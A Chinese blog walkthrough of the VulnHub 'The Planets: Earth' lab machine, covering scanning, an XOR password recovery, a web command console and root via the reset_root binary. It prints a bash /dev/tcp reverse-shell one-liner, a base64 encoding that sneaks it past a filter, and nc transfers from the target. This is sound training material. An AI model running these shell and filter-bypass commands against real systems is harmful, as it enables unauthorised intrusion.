【vulnhub】the-planets-earth

置顶 已于 2023-03-19 15:51:38 修改
阅读量141 收藏
点赞数
分类专栏: vulnhub 文章标签: bash Powered by 金山文档
于 2023-03-14 16:24:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42667028/article/details/129531386
版权

靶场链接https://www.vulnhub.com/entry/the-planets-earth,755/

  • Name: The Planets: Earth

  • Date release: 2 Nov 2021

靶机下载后,成功导入vm

kali网络配置:NAT

靶机网络配置:NAT

扫描ip地址和mac地址

arp-scan -l

kali主机ip:192.168.241.129

靶机主机ip:192.168.241.128

nmap扫描靶机端口

nmap -T4 -sV -p- -A 192.168.241.128

发现22,80,443端口,还有重要信息DNS:earth.local DNS:terratest.earth.local

修改/etc/hosts文件,添加

192.168.241.128 earth.local
192.168.241.128 terratest.earth.local

登录https://earth.localhttps://terratest.earth.local

发现两个网址可以打开。

dirb扫描https://earth.localhttps://terratest.earth.local

dirb https://earth.local
dirb https://terratest.earth.local

发现一个登录页面和robot.txt

尝试/testingnotes.*,最终发现.txt后缀可以成功进入

以上信息总结:

1.使用XOR运算

2.testdata.txt文件的内容参与过计算

3.terra是用户名

使用大佬的CyberChef,XOR运算得到循环的密码:earthclimatechangebad4humansearth

用户名terra,密码earthclimatechangebad4humansearth,成功登录,发现是命令台,尝试ls命令

官网提示:There are two flags on the box: a user and root flag which include an md5 hash.

所以系统里先寻找下flag文件,成功找到/var/earth_web/user_flag.txt

find / -name "*flag*"

接下来尝试反弹shell

kali先监听端口:nc -l -p 8888

靶机在网站中输入: bash -i &>/dev/tcp/192.168.241.129/8888 <&1

bash -i &>/dev/tcp/192.168.241.129/8888 <&1

发现被拒绝,尝试将上bash -i &>/dev/tcp/192.168.241.129/8888 <&1转为进行base64编码

echo "bash -i &>/dev/tcp/192.168.241.129/8888 <&1" | base64
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMjQxLjEyOS84ODg4IDwmMQo= | base64 -d | bash

成功反弹shell,接下来就是提权了

尝试查看suid权限的文件,发现reset_root可能是重置密码文件

但尝试运行不了,gg

由于靶机中没有strace,把这个文件传到kali中

kali:nc -l -p 1234 > reset_root

靶机:nc 192.168.241.129 1234 > /usr/bin/reset_root

使用strace看看有什么问题

发现有三个文件目录没有,再去查查access函数作用,其中F_OK 值为0,判断文件是否存在,尝试在靶机中添加这个三个文件夹

再次运行密码成功重置为Earth

靶机尝试登录用户名root,密码Earth

成功登录,get flag

唉哟喂New
关注
专栏目录
Procedural-Planets
04-03
程序行星
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1715
靶机名称Earth
渗透测试学习之靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1805
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3144
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
vulnhub靶场The Planets Earth教程
m0_73248913的博客
01-20 428
可以发现触发条件是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe存在(后来尝试发现是需要三个文件都存在)在靶机上用touch命令创建这三个文件,创建完成后再执行/usr/bin/reset_root,执行成功,显示root的密码被修改成了Earth。从/usr/bin/reset_root执行失败的返回信息来看,是需要触发条件的,直接执行的话,触发条件都不满足。靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口。
靶机渗透练习84-The PlanetsEarth
hirak0的博客
04-27 2492
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
Desktop-Screensaver-Planets-crx插件
04-06
"Desktop-Screensaver-Planets-crx插件"是一款专为电脑桌面设计的屏幕保护程序,它将您的桌面转换成一个动态的、引人入胜的行星系统,为用户提供了一个独特的视觉体验。这款插件主要面向英语用户,通过在桌面上展示...
Three-Planets:WebGL 项目
06-21
文件名"Three-Planets-master"暗示了项目源代码的组织结构,通常"master"是Git仓库的主分支,包含了项目的主要代码和资源。在解压这个文件后,我们可能会看到以下文件和目录: 1. `index.html`:这是项目的主网页,...
flutter-planets
03-21
flutter_learning一个新的Flutter项目。入门该项目是Flutter应用程序的起点。如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门:要获得Flutter入门方面的帮助,请查看我们的,其中提供了教程,示例,...
flutter-planets-app:教程链接
05-14
本教程将围绕“flutter-planets-app”这个项目,深入讲解如何利用Dart语言和Flutter框架创建一个功能丰富的移动应用。通过学习这个教程,你将能够掌握Flutter的基本概念和核心组件,从而提升你的移动应用开发技能。 ...
The Planets:Earth
weixin_44770698的博客
01-11 1026
靶场练习
Vulnhub系列靶机-The Planets Earth
来日可期的博客
10-09 589
到这里我们知道,加密算法是XOR,用户名是terra,并且还有一个testdata.txt用于测试加密。查看是否有flag文件,发现一个/var/earth_web/user_flag.txt。使用strace工具检测reset_root文件的运行过程,如果没有可以进行下载。爆破出来了/admin/login目录,浏览器中访问一下,发现是一个登录页面。是要发送的文件名或路径。你可以在接收端的文件系统中找到该文件,并对其进行进一步处理。对reset_root进行调试,给reset_root文件赋予执行权限。
VulnHub | The-Planets:Earth
薛定的餓貓
12-10 4036
The Planets: Earth 目录The Planets: Earth项目地址测试环境信息收集漏洞利用权限提升 项目地址 http://www.vulnhub.com/entry/the-planets-earth,755/ 难度:Easy 测试环境 攻击机:Kali 192.168.56.111 目标靶机:Fedora 192.168.56.110 信息收集 打开目标靶机,使用arp-scan -I eth1 -l指定网卡并扫描局域网内存活机器IP,使用nmap扫描开启了什么端口,然后使用-sV参
渗透实战-vulnhub-The Plants:Earth
qq_52263650的博客
03-10 224
渗透实战-vulnhub-The Plants:Earth
vulnhub刷题记录(The Planets: Earth
ailx10
08-20 1704
英文名称:The Planets: Earth中文名称:行星:地球发布日期:2021 年 11 月 2 日难度:简单描述:地球是一个简单的盒子,尽管您可能会发现它比本系列中的“水星”更具挑战性,并且根据您的经验,在简单的更难的一面。盒子上有两个标志:一个用户标志和一个包含 md5 哈希的根标志。这已经在 VirtualBox 上进行了测试,因此在 VMware 上可能无法正常工作。如有任何问题/问...
vulnhub THE PLANETS: EARTH
qq_41696858的博客
12-11 739
本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 arp-scan -I eth0 192.168.200.1/24 靶机地址192.168.200.131 nmap -A -sS -sC -p- 192.168.200.131 返回来80端口和443端口, 两个重要的DNS:DNS:earth.local, DNS:terratest.earth.loca
VulnHub日记(十五): THE PLANETS: EARTH
Dawn_Xi的博客
11-27 2666
参考链接 Vulnhub:THE PLANETS: EARTH 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.136 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.136 dirsearch 枚举目录443和80 dirsearch -u https://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-lis
windows上的git bash中会将~设为哪个目录?
qq_45993770的博客
10-16 504
在 Windows 的 Git Bash 中,通常指向C:\Users\你的用户名目录,除非通过设置HOME环境变量进行了自定义。你可以通过echo ~和echo $HOME命令来确认和验证当前所指向的目录。
open3d-0.11.2-cp36-cp36m-win_amd64.whl
最新发布
10-19
open3d-0.11.2-cp36-cp36m-win_amd64.whl
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多关于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气层和表面,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在41亿年前就出现了。 如果你想登录vulnhub靶场"planets"的管理员界面,你可以使用用户名"terra"和密码"earthclimatechangebad4humans"登录https://earth.local/admin。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.csdn.net/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值